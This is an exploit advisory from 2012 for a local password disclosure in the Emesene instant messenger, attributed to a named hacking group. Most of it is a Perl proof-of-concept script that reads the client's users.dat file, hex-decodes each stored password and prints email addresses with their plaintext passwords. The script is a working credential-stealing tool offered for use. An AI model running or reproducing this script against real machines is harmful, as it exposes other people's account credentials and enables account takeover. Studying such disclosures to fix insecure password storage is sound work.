|
# Exploit Title: Emesene Password Disclosure # Category: Local # Date: 29/06/2012 # Author: Daniel Godoy # Author Mail: DanielGodoy[at]GobiernoFederal[dot]com # Author Web: www.delincuentedigital.com.ar # Sofware web: http://blog.emesene.org/p/downloads.html # Tested on: Linux
The only requirement to run the script is that the customer is highlighted remember password.
[Comment] Greetz: Hernan Jais, Alfonso Cuevas, SPEED, hacklego, Incid3nt, Maximiliano Soler, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0, InyeXion, ksha, zerial,LinuxFer, Scorp her0, r0dr1 y demas user de RemoteExecution www.remoteexecution.info www.remoteexcution.com.ar #RemoteExecution Hacking Group
[PoC]
#!/usr/bin/perl #/home/$HOME/.config/emesene1.0 system("clear"); print "[ EMESENE PASSWORD DISCLOSURE ]\n"; print "TESTED ON UBUNTU 10.04 LTS\n"; my $pwn="users.dat"; open (ENTRADA,"<$pwn") || die "ERROR: No puedo abrir el fichero $pwn\n"; $cantidad++ while <ENTRADA>; close (ENTRADA); open (ENTRADA,"<$pwn") || die "ERROR: No puedo abrir el fichero $pwn\n"; @source = <ENTRADA>; for($i = 0; $i < $cantidad; $i++) { @password= split(":", $source[$i]); print "Mail: ".$password[0]." Password PWND! => "; print pack("H*", $password[1]), "\n"; } close (ENTRADA);
------------------------- Correo enviado por medio de MailMonstruo - www.mailmonstruo.com
|